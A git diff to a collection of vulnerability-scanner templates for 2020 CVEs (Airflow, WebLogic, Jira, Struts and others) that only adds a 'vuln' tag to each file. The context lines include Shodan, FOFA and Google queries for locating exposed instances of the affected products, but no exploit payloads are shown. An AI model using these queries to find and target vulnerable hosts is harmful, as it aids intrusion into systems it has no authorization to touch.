318f2009ba1..fb5d77c977c 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev,vkev + tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 9e278e267b7..9de981c9309 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -29,7 +29,7 @@ info: product: kylin shodan-query: http.favicon.hash:-186961397 fofa-query: icon_hash=-186961397 - tags: cve,cve2020,apache + tags: cve,cve2020,apache,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 233dd391bdd..da838b73840 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: apache product: unomi - tags: cve,cve2020,apache,rce,vkev + tags: cve,cve2020,apache,rce,vkev,vuln variables: id: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 0a88dc213bc..ce8c933dc36 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"apache apisix dashboard" fofa-query: title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" - tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix + tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 4ccfd81674a..544b98f4220 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -28,7 +28,7 @@ info: vendor: ithemes product: paypal_pro framework: wordpress - tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes + tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 85120b59a01..7539a619cb3 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -37,7 +37,7 @@ info: - body="powered by gitea version" - title="gitea" google-query: intitle:"gitea" - tags: cve2020,cve,rce,gitea,authenticated,git,intrusive + tags: cve2020,cve,rce,gitea,authenticated,git,intrusive,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 622e5a0a017..998d324753b 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2020,atlassian,jira,exposure,disclosure + tags: cve,cve2020,atlassian,jira,exposure,disclosure,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 6c254d1c761..50d9929796b 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2020,atlassian,jira,packetstorm + tags: cve,cve2020,atlassian,jira,packetstorm,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index d67b3f73b9e..b5a51b3e3c8 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -34,7 +34,7 @@ info: fofa-query: - icon_hash=688609340 - body="cockpit" - tags: cve2020,cve,cockpit,agentejo,xss,oss + tags: cve2020,cve,cockpit,agentejo,xss,oss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index c3bd395b885..fd8aec0e2b0 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: nedi product: nedi - tags: cve,cve2020,nedi,xss + tags: cve,cve2020,nedi,xss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index bb3181b226d..20fda74f352 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -36,7 +36,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm,vkev + tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 14ab2b96840..78bc5b7a6da 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"oracle business intelligence sign in" fofa-query: title="oracle business intelligence sign in" google-query: intitle:"oracle business intelligence sign in" - tags: cve,cve2020,oracle,lfi,kev,packetstorm,vkev + tags: cve,cve2020,oracle,lfi,kev,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index c9d7a0e3f9f..34c0caa20e2 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve2020,cve,oracle,rce,weblogic,oast,kev,vkev + tags: cve2020,cve,oracle,rce,weblogic,oast,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index c93c47d02c7..aaf457a8004 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -34,7 +34,7 @@ info: - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm,vkev + tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm,vkev,vuln variables: str: "{{randstr}}" revstr: "{{reverse(str)}}" diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index cd7e03365c0..3233035869d 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: supremainc product: biostar_2 - tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc + tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index c9270f4d9ef..c8fba3375be 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"traefik" fofa-query: title="traefik" google-query: intitle:"traefik" - tags: cve,cve2020,traefik,redirect + tags: cve,cve2020,traefik,redirect,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 6b84b6895e0..76a1875463c 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: yiiframework product: yii - tags: cve,cve2020,rce,yii,yiiframework + tags: cve,cve2020,rce,yii,yiiframework,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 6aeb5d81f91..29f22d86909 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -31,7 +31,7 @@ info: fofa-query: - app="nette-Framework" - app="nette-framework" - tags: cve2020,cve,nette,rce,vkev + tags: cve2020,cve,nette,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-15415.yaml b/http/cves/2020/CVE-2020-15415.yaml index 9e73cb93aac..70e3a5c54aa 100644 --- a/http/cves/2020/CVE-2020-15415.yaml +++ b/http/cves/2020/CVE-2020-15415.yaml @@ -25,7 +25,7 @@ info: vendor: draytek product: vigor fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"' - tags: cve,cve2020,draytek,rce,router,kev,vkev + tags: cve,cve2020,draytek,rce,router,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 1cfd374744b..b25fa1628e8 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tileserver product: tileservergl - tags: cve,cve2020,xss,tileserver,packetstorm + tags: cve,cve2020,xss,tileserver,packetstorm,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 12ec8990270..57a74988fee 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -31,7 +31,7 @@ info: max-request: 1 vendor: mobileiron product: core - tags: cve,cve2020,mobileiron,rce,sentry,kev,vkev + tags: cve,cve2020,mobileiron,rce,sentry,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 116153a4e0d..da2857122fe 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -28,7 +28,7 @@ info: vendor: terra-master product: tos fofa-query: '"terramaster" && header="tos"' - tags: cve2020,cve,terramaster,rce,terra-master,vkev + tags: cve2020,cve,terramaster,rce,terra-master,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index dfa3c45d8f2..d77058fe87d 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -32,7 +32,7 @@ info: - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" google-query: intitle:"sign in - gogs" - tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive + tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index e891e81db39..fb359b1d78e 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -31,7 +31,7 @@ info: - html:"DIR-816L" - http.html:"dir-816l" fofa-query: body="dir-816l" - tags: cve2020,cve,dlink,xss + tags: cve2020,cve,dlink,xss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-15906.yaml b/http/cves/2020/CVE-2020-15906.yaml index a4e6f08e970..cd01285757f 100644 --- a/http/cves/2020/CVE-2020-15906.yaml +++ b/http/cves/2020/CVE-2020-15906.yaml @@ -26,7 +26,7 @@ info: shodan-query: title:"Tiki Wiki CMS" fofa-query: title="Tiki Wiki CMS" google-query: intitle:"Tiki Wiki CMS - tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass + tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index 72dac5400f2..9137af72879 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: midasolutions product: eframework - tags: cve2020,cve,mida,rce,packetstorm,midasolutions,vkev + tags: cve2020,cve,mida,rce,packetstorm,midasolutions,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 43a4697adc7..36ed1cd1f66 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: unified_ip_conference_station_7937g_firmware - tags: cve,cve2020,dos,cisco,packetstorm,vkev + tags: cve,cve2020,dos,cisco,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 43667acacf7..1ff6e432bba 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: saltstack product: salt - tags: cve2020,cve,vulhub,saltstack,kev,vkev + tags: cve2020,cve,vulhub,saltstack,kev,vkev,vuln variables: priv: "{{to_lower(rand_text_alpha(5))}}" roaster: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index fac1b706209..d4893be7a09 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microsoft product: sharepoint_enterprise_server - tags: cve,cve2020,msf,sharepoint,iis,microsoft,ssi,rce + tags: cve,cve2020,msf,sharepoint,iis,microsoft,ssi,rce,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 2e748eaf53f..a41197658f4 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -27,7 +27,7 @@ info: vendor: themeinprogress product: nova_lite framework: wordpress - tags: cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress + tags: cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index a4b448efbe8..1d2422bb1a6 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve2020,cve,xss,wso2,vkev + tags: cve2020,cve,xss,wso2,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 72efcc6a203..f66a00310eb 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: seowonintech product: slc-130 - tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech,vkev + tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index a58905f72c9..bfdd4cbae2b 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio,vkev + tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index f3226e1c488..4d7acb84def 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -38,7 +38,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists,vkev + tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index a61839b69e8..c3d04fe103b 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: articatech product: web_proxy - tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech,vkev + tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 8caa9dba6be..b7f804c0508 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: articatech product: web_proxy - tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli,vkev + tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 38f922fe213..efddbd2c20a 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: flink - tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive,vkev + tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 43ef775f734..83aa0ce551b 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: apache product: flink - tags: cve,cve2020,apache,lfi,flink,kev,vkev + tags: cve,cve2020,apache,lfi,flink,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index c3f38177896..1b0c9e2ecf6 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve,cve2020,apache,airflow,auth-bypass + tags: cve,cve2020,apache,airflow,auth-bypass,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 390139baf6e..41089b1a642 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2020,apache,rce,struts,kev,packetstorm,vkev + tags: cve,cve2020,apache,rce,struts,kev,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 3e62886f79d..50076c92244 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: zblogcn product: z-blogphp - tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn + tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 7b7b0478adf..21746d04992 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -27,7 +27,7 @@ info: vendor: jeesns product: jeesns fofa-query: title="jeesns" - tags: cve2020,cve,jeesns,xss + tags: cve2020,cve,jeesns,xss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 0ce5ee05912..78d9f69229d 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -27,7 +27,7 @@ info: vendor: jeesns product: jeesns fofa-query: title="jeesns" - tags: cve,cve2020,jeesns,xss + tags: cve,cve2020,jeesns,xss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index bbd0e0914a4..99a9c2a45f0 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -29,7 +29,7 @@ info: fofa-query: - title="Jeesns" - title="jeesns" - tags: cve,cve2020,jeesns,xss + tags: cve,cve2020,jeesns,xss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index 08ca994a61e..65a1d02e9f0 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: fhem product: fhem - tags: cve,cve2020,fhem,lfi + tags: cve,cve2020,fhem,lfi,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index b979bd0aba3..9cc068d985e 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="ofbiz" - app="apache_ofbiz" - tags: cve2020,cve,apache,xss,ofbiz,vkev + tags: cve2020,cve,apache,xss,ofbiz,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index d21f663e9db..bb4a723875d 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -29,7 +29,7 @@ info: product: qdpm shodan-query: http.favicon.hash:762074255 fofa-query: icon_hash=762074255 - tags: cve2020,cve,xss,qdpm,unauth + tags: cve2020,cve,xss,qdpm,unauth,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index ea65f02fb48..d28e0750d18 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -31,7 +31,7 @@ info: product: kylin shodan-query: http.favicon.hash:-186961397 fofa-query: icon_hash=-186961397 - tags: cve,cve2020,apache,kylin,rce,oast,kev,vkev + tags: cve,cve2020,apache,kylin,rce,oast,kev,vkev,vuln variables: username: "{{username}}:" password: "{{password}}" diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 4935d6decef..016baa89609 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: gridx_project product: gridx - tags: cve2020,cve,gridx,rce,gridx_project,vkev + tags: cve2020,cve,gridx,rce,gridx_project,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 1c09be9d6cb..4ae1f76ba55 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -28,7 +28,7 @@ info: vendor: zzcms product: zzcms fofa-query: zzcms - tags: cve2020,cve,zzcms,xss + tags: cve2020,cve,zzcms,xss,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index d820e215c19..a5ca0cbea95 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="weiphp" - body="weiphp5.0" - tags: cve,cve2020,weiphp,sql,sqli,vkev + tags: cve,cve2020,weiphp,sql,sqli,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index a75809b5b32..99ed6595b2b 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - tags: cve2020,cve,vpn,xss,paloaltonetworks + tags: cve2020,cve,vpn,xss,paloaltonetworks,vuln flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-20601.yaml b/http/cves/2020/CVE-2020-20601.yaml index 196f0ef02bb..a50111abb7b 100644 --- a/http/cves/2020/CVE-2020-20601.yaml +++ b/http/cves/2020/CVE-2020-20601.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: thinkcmf product: thinkcmf - tags: cve,cve2020,thinkcmf,rce + tags: cve,cve2020,thinkcmf,rce,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index f7ced1bcd5e..85d42f814e0 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -33,7 +33,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm,vkev + tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 3d77ba7ffb5..730cfd3643d 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: wdja product: wdja_cms - tags: cve2020,cve,xss,wdja,shadoweb + tags: cve2020,cve,xss,wdja,shadoweb,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index ff0695f4276..967dcf1a183 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: domainmod product: domainmod - tags: cve2020,cve,domainmod,xss,authenticated + tags: cve2020,cve,domainmod,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index f85b7a758cc..0fab25fd5fa 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:jenkins:jenkins" - product:"jenkins" fofa-query: icon_hash=81586312 - tags: cve,cve2020,jenkins + tags: cve,cve2020,jenkins,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index dafcdaa9072..43bac61c202 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: inspur product: clusterengine - tags: cve2020,cve,clusterengine,rce,inspur,vkev + tags: cve2020,cve,clusterengine,rce,inspur,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index b15f9c5f074..004685c3b0c 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -28,7 +28,7 @@ info: vendor: jenkins product: audit_trail framework: jenkins - tags: cve,cve2020,jenkins,xss,plugin + tags: cve,cve2020,jenkins,xss,plugin,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-21998.yaml b/http/cves/2020/CVE-2020-21998.yaml index 812cc3a34e2..02131847ad1 100644 --- a/http/cves/2020/CVE-2020-21998.yaml +++ b/http/cves/2020/CVE-2020-21998.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: homeautomation_project product: homeautomation - tags: cve,cve2020,homeautomation,packetstorm,iot,redirect + tags: cve,cve2020,homeautomation,packetstorm,iot,redirect,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-22165.yaml b/http/cves/2020/CVE-2020-22165.yaml index fcbce035889..a2734497969 100644 --- a/http/cves/2020/CVE-2020-22165.yaml +++ b/http/cves/2020/CVE-2020-22165.yaml @@ -27,7 +27,7 @@ info: vendor: phpgurukul product: hospital_management_system fofa-query: title="Hospital Management System" && body="HMS" - tags: cve2020,cve,hms,cms,sqli,phpgurukul,vkev + tags: cve2020,cve,hms,cms,sqli,phpgurukul,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 5280305dbfc..92b0db0e90e 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="74cms" - body="74cms" - tags: 